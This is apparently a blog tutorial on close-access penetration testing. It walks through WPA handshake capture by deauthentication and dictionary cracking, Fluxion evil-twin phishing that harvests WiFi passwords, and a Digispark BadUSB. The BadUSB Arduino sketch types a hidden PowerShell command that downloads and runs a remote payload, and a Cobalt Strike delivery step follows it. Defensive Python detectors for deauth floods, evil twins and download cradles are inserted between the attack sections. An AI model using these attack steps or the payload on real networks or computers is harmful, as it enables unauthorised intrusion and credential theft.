Near-source penetration testing

Preface

  • Blog home page: Scorpio_m7
  • This article is an original work by Scorpio_m7, first published on CSDN!
  • First published: January 28, 2022
  • Persistence and hard work will surely bring poetry and distance!
  • The author's level is very limited. If you find an error, please leave a message! Thank you very much!

WiFi penetration

WiFi password brute force

Generate a dictionary file, 1.txt, from an online password list. First check the wireless network card with the aircrack-ng suite included in Kali:

root@kali:~# iwconfig 
lo        no wireless extensions.
eth0      no wireless extensions.
wlan0     IEEE 802.11  ESSID:off/any  
          Mode:Managed  Access Point: Not-Associated   Tx-Power=20 dBm   
          Retry short  long limit:2   RTS thr:off   Fragment thr:off
          Encryption key:off
          Power Management:off

Kill any processes that may interfere, then put the wireless card into monitor mode with airmon-ng start wlan0. Once monitor mode is enabled, ifconfig shows the monitor interface. Listen to all nearby WiFi traffic with airodump-ng wlan0mon and exit once the target has been identified. Keep airodump-ng --bssid f6:4c:a1:b5:c6:81 -c 10 -w test wlan0mon running in the background to capture the specified AP's traffic, where -c specifies the channel. Then attack the chosen wireless client and router to obtain the handshake packet:

root@kali:~# aireplay-ng -0 2 -a F6:4C:A1:B5:C6:81 -c 20:64:CB:0E:E3:ED wlan0mon
14:52:26  Waiting for beacon frame (BSSID: F6:4C:A1:B5:C6:81) on channel 11
14:52:26  Sending 64 directed DeAuth (code 7). STMAC: [20:64:CB:0E:E3:ED] [ 1|62 ACKs]
14:52:27  Sending 64 directed DeAuth (code 7). STMAC: [20:64:CB:0E:E3:ED] [ 0|65 ACKs]

Check the capture running in the background; if the WPA handshake has been captured, the attack succeeded:

root@kali:~# airodump-ng --bssid F6:4C:A1:B5:C6:81 -c 11 -w test wlan0mon
14:50:39  Created capture file "test-01.cap".
 CH 11 ][ Elapsed: 12 mins ][ 2021-10-26 15:03 ][ WPA handshake: F6:4C:A1:B5:C6:81 
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID
 F6:4C:A1:B5:C6:81  -25  27     6548       59    0  11  360   WPA2 CCMP   PSK  DESKTOP-ATOB8DH 5656                                      
 BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes
 F6:4C:A1:B5:C6:81  20:64:CB:0E:E3:ED   -1    1e- 0      0       51    

Recover the WiFi password by running a dictionary attack against the captured handshake:

root@kali:~# aircrack-ng -w 1.txt test-01.cap 
Reading packets, please wait...
Opening test-01.cap
Read 3938 packets.
   #  BSSID              ESSID                     Encryption
   1  F6:4C:A1:B5:C6:81  DESKTOP-ATOB8DH 5656      WPA (1 handshake)
Choosing first network as target.
Reading packets, please wait...
Opening test-01.cap
Read 3938 packets.
1 potential targets
                               Aircrack-ng 1.6 
      [00:00:00] 1/1 keys tested (25.69 k/s) 
      Time left: --
                           KEY FOUND! [ 12345678 ]
      Master Key     : 53 CB 0A A3 F1 FD 34 35 78 A6 C9 FF 24 FC E6 77 
                       02 21 79 8F 36 A9 31 47 7E 33 E6 A8 F0 34 E5 3F 
      Transient Key  : C7 D1 DD 3D D2 CB 16 34 55 C7 CC 92 6C F8 0C 24 
                       C0 27 A2 2C BA 55 8E 44 A9 5D 05 B9 23 1A 04 0D 
                       BF DD 92 F1 EE 03 8A A3 3E D4 21 90 43 E7 8F 53 
                       01 B4 A6 58 D0 49 D1 6B 0B 8E 0B CD 32 EE C8 EA 
      EAPOL HMAC     : 77 E9 ED 54 77 B7 65 99 D5 B2 01 8B 3F 88 58 66 
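The deauthentication burst shown above ("Sending 64 directed DeAuth (code 7)") is exactly what a wireless IDS keys on. The following Python is an added defender-side example, not part of the original post: it parses bare 802.11 management frames and flags a BSSID that sends more deauthentication frames within a short window than an access point would send on its own. The frames are constructed inline using the MAC addresses from the capture above and omit radiotap and FCS, which a real capture would carry.

```python
import struct
from collections import defaultdict

DEAUTH = 12   # 802.11 management subtype 1100b, the frame type aireplay-ng -0 floods
BEACON = 8

def mac(s):
    return bytes.fromhex(s.replace(":", ""))
def mac_str(b):
    return ":".join(f"{x:02X}" for x in b)

def mgmt_frame(subtype, dst, src, bssid, reason=7):
    """Constructed sample: bare 802.11 management header (no radiotap, no FCS)."""
    hdr = struct.pack("<HH", subtype << 4, 0) + mac(dst) + mac(src) + mac(bssid) + b"\x00\x00"
    body = struct.pack("<H", reason) if subtype == DEAUTH else b""   # reason code field
    return hdr + body

def parse_deauth(frame):
    """Return (bssid, station, reason) for a deauth frame, else None."""
    if len(frame) < 26:
        return None
    fc = struct.unpack_from("<H", frame, 0)[0]
    if (fc >> 2) & 0x3 != 0 or (fc >> 4) & 0xF != DEAUTH:   # type must be management
        return None
    dst, src, bssid = frame[4:10], frame[10:16], frame[16:22]
    station = dst if src == bssid else src     # the client being kicked off the network
    return mac_str(bssid), mac_str(station), struct.unpack_from("<H", frame, 24)[0]

def detect_deauth_flood(frames, window_s=2.0, threshold=10):
    """frames: (timestamp, raw_frame) pairs. Returns {bssid: peak deauth count in any window}.
    An AP legitimately sends a few deauths; dozens within seconds is the attack signature."""
    times = defaultdict(list)
    for ts, raw in frames:
        d = parse_deauth(raw)
        if d:
            times[d[0]].append(ts)
    alerts = {}
    for bssid, tl in times.items():
        tl.sort()
        lo = 0
        for hi, t in enumerate(tl):             # sliding window over sorted timestamps
            while t - tl[lo] > window_s:
                lo += 1
            if hi - lo + 1 >= threshold:
                alerts[bssid] = max(alerts.get(bssid, 0), hi - lo + 1)
    return alerts

def sample_capture():
    """Constructed capture: beacons, one isolated deauth, then a 64-frame burst like the log above."""
    ap, sta = "F6:4C:A1:B5:C6:81", "20:64:CB:0E:E3:ED"
    frames = [(t, mgmt_frame(BEACON, "FF:FF:FF:FF:FF:FF", ap, ap)) for t in (0.0, 0.1, 0.2)]
    frames.append((0.5, mgmt_frame(DEAUTH, sta, ap, ap, reason=3)))       # benign, isolated
    frames += [(10.0 + i * 0.01, mgmt_frame(DEAUTH, sta, ap, ap, reason=7)) for i in range(64)]
    return frames
```

Calling detect_deauth_flood(sample_capture()) reports the AP's BSSID with a peak of 64 deauth frames; the single benign deauth never reaches the threshold.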

WiFi phishing

Use the Fluxion tool. First check the wireless network card with iwconfig, then run fluxion -i to install the dependencies.

  1. First, obtain the target's handshake packet

    [2] Handshake Snooper   Retrieves WPA/WPA2 encryption hashes.
    [3] Scan all channels  (2.4GHz & 5Ghz)
    [2] skip
    [2] aireplay-ng deauthentication method (aggressive)
    [2] cowpatty verification (This is recommended)
    [1] Every 30 seconds (recommend).
    [2] Synchronously (recommend).
    
  2. Then run the flooding attack against the target AP to knock out its wireless service

    [1] Select attack mode
    [1] The exclusive portal creates an "evil twin" access point
    [2] skip
    [2] wlan0    [*] Ralink Technology, Corp. RT2870/RT3070      
    [2] aireplay
    [1] rogue AP - hostapd (recommend)
    [1] hash - cowpatty
    [1] Using captured hash file
    [2] cowpatty verification (This is recommended)
    
  3. Using the phishing portal, spoof the target network's details and lure users into connecting

    [1] Create an SSL certificate
    [2] Emulation
    [03] Generic authentication web page                              Chinese 
    
  4. Once a user connects to the phishing WiFi, the password they enter is checked against the handshake captured earlier; if the check succeeds the attack on the target AP stops, otherwise it continues until the password is recovered.
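An evil twin of the kind Fluxion creates is visible in the same airodump-ng scan an attacker uses: the target ESSID suddenly appears a second time, served by a different BSSID with no encryption. This Python detector is an added example, not from the original post or from Fluxion; its scan rows are constructed (the rogue BSSID 00:11:22:33:44:55 is made up), and the optional known-BSSID inventory is an assumption about what a site's AP records would provide.

```python
from collections import defaultdict

# Constructed scan rows in airodump-ng column order: BSSID, PWR, CH, ENC, AUTH, ESSID.
# The first row is the real AP from the capture above; 00:11:22:33:44:55 is a made-up rogue.
SCAN = [
    ("F6:4C:A1:B5:C6:81", -25, 11, "WPA2", "PSK", "DESKTOP-ATOB8DH 5656"),
    ("F6:4C:A1:B5:C6:81", -26, 11, "WPA2", "PSK", "DESKTOP-ATOB8DH 5656"),  # same AP, next sweep
    ("00:11:22:33:44:55", -30, 11, "OPN", "", "DESKTOP-ATOB8DH 5656"),      # open twin, same channel
    ("AA:BB:CC:DD:EE:01", -60, 6, "WPA2", "PSK", "OfficeNet"),
]

def find_evil_twins(rows, known=None):
    """Flag, per ESSID, any BSSID that is open while another BSSID with the same ESSID is
    encrypted (the captive-portal twin), or that is absent from an optional inventory
    `known` = {essid: {bssid, ...}} (assumed to come from the site's AP records)."""
    by_essid = defaultdict(dict)
    for bssid, pwr, ch, enc, auth, essid in rows:
        by_essid[essid][bssid] = (enc, ch, pwr)        # later sweeps overwrite earlier ones
    findings = []
    for essid, aps in by_essid.items():
        encrypted_present = any(enc != "OPN" for enc, _, _ in aps.values())
        for bssid, (enc, ch, pwr) in aps.items():
            unknown = known is not None and essid in known and bssid not in known[essid]
            open_twin = enc == "OPN" and encrypted_present
            if unknown or open_twin:
                findings.append({"essid": essid, "bssid": bssid, "enc": enc, "ch": ch,
                                 "reason": "BSSID not in inventory" if unknown
                                 else "open twin of encrypted SSID"})
    return findings
```

Without an inventory the open twin is still caught because the same ESSID is also seen with WPA2; with an inventory the rogue is reported as an unknown BSSID even if it copied the encryption settings.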

Wireless router vulnerability exploitation

RouterSploit contains hundreds of exploit modules for 27+ brands, covering hundreds of routers, cameras and other devices. It can identify the device model automatically and scan it for exploitable vulnerabilities.

BadUSB

Tool preparation

Digispark development board. Taobao link: https://m.tb.cn/h.fe2pxMT?sm=0b41c0

Install the Arduino IDE

https://downloads.arduino.cc/arduino-1.8.13-windows.exe

Driver installation

If the operating system is 64-bit, select DPInst64.exe, otherwise select DPInst.exe.

Environment configuration

Follow the link to complete the configuration and flash the code: https://www.cnblogs.com/qianxiao996/p/13574566.html

#include "DigiKeyboard.h"
void setup() {
  // put your setup code here, to run once:
  DigiKeyboard.delay(2000);                               // Wait for 2 seconds
  DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);        // Send Win+R
  DigiKeyboard.delay(800);
  //DigiKeyboard.println("cmd /T:01 /K mode CON: COLS=16 LINES=1");  // Minimize the CMD window to keep it hidden
  DigiKeyboard.delay(2000);
  DigiKeyboard.println(F("powershell -WindowStyle Hidden -NoLogo -executionpolicy bypass IEX(New-Object Net.WebClient).DownloadString('http://ip:80/a'); "));  // payload to execute
  //DigiKeyboard.println("echo set-alias -name rookie -value Invoke-Expression;rookie(new-object net.webclient).downloadstring('http://ip:80/a') | powershell -");
  DigiKeyboard.delay(10000);
  DigiKeyboard.sendKeyStroke(KEY_ENTER);
  //DigiKeyboard.sendKeyStroke(KEY_F4, MOD_ALT_LEFT);     // After execution, Alt+F4 closes the window
  DigiKeyboard.delay(10000);
  DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);        // Send Win+R
}

void loop() {
  // put your main code here, to run repeatedly:
}

The sketch opens the Windows+R Run dialog, types the command and executes it, which downloads and runs the payload. Click Upload and insert the BadUSB within 60 s.
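On the defender's side, the payload line the sketch types is a distinctive process-creation record: a PowerShell download cradle whose parent is explorer.exe, because the Run dialog launched it. The following Python is an added example, not part of the original post: it scores constructed 4688-style (parent image, command line) records for the indicators present in the sketch's command and in its commented-out alias variant.

```python
import re

# Indicators taken from the payload in the sketch above and from its commented-out alias variant
INDICATORS = {
    "hidden_window":   re.compile(r"-w(indowstyle)?\s+hidden", re.I),
    "bypass_policy":   re.compile(r"-e(xecutionpolicy|p)?\s+bypass", re.I),
    "download_cradle": re.compile(r"Net\.WebClient\)?\.DownloadString|Invoke-WebRequest|\biwr\b", re.I),
    "invoke_expr":     re.compile(r"\bIEX\b|Invoke-Expression", re.I),
    "alias_obfusc":    re.compile(r"set-alias\s+-name\s+\S+\s+-value\s+Invoke-Expression", re.I),
}

def score(text):
    """Names of the indicators present in a command line or a logged script block (event 4104)."""
    return [name for name, rx in INDICATORS.items() if rx.search(text)]

def classify(parent, cmd):
    """Verdict for one process-creation record (parent image, new process command line).
    A Run-dialog launch has explorer.exe as parent; a download cradle started from there
    is the BadUSB pattern, since an operator would normally type it into an existing console."""
    hits = score(cmd)
    if parent.lower() == "explorer.exe" and ("download_cradle" in hits or "invoke_expr" in hits):
        return "alert", hits
    if len(hits) >= 2:
        return "suspicious", hits
    return "ok", hits

# Constructed 4688-style records, not real telemetry
EVENTS = [
    ("explorer.exe", "powershell -WindowStyle Hidden -NoLogo -executionpolicy bypass "
                     "IEX(New-Object Net.WebClient).DownloadString('http://ip:80/a');"),
    ("cmd.exe", "powershell -"),   # piped variant: payload arrives on stdin, only 4104 shows it
    ("explorer.exe", "powershell -NoProfile Get-Process"),
    ("svchost.exe", "powershell -ExecutionPolicy Bypass -File C:\\scripts\\inventory.ps1"),
]

def triage(events):
    """Map each record to its verdict so the alerts stand out."""
    return [(parent, classify(parent, cmd)[0]) for parent, cmd in events]
```

The piped variant shows why command-line logging alone is not enough: its process record is just "powershell -", and the alias trick only becomes visible in script block logging, where score() still matches it.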

Generating the Trojan with Cobalt Strike

Attacks -> Web Drive-by -> Scripted Web Delivery -> set the listener -> copy the generated command into the code

Other ways of building a BadUSB: https://mrxn.net/jswz/diy-myself-badusb.html

Keywords: network security, penetration testing, web security

Added by walnoot on Sat, 29 Jan 2022 02:34:03 +0200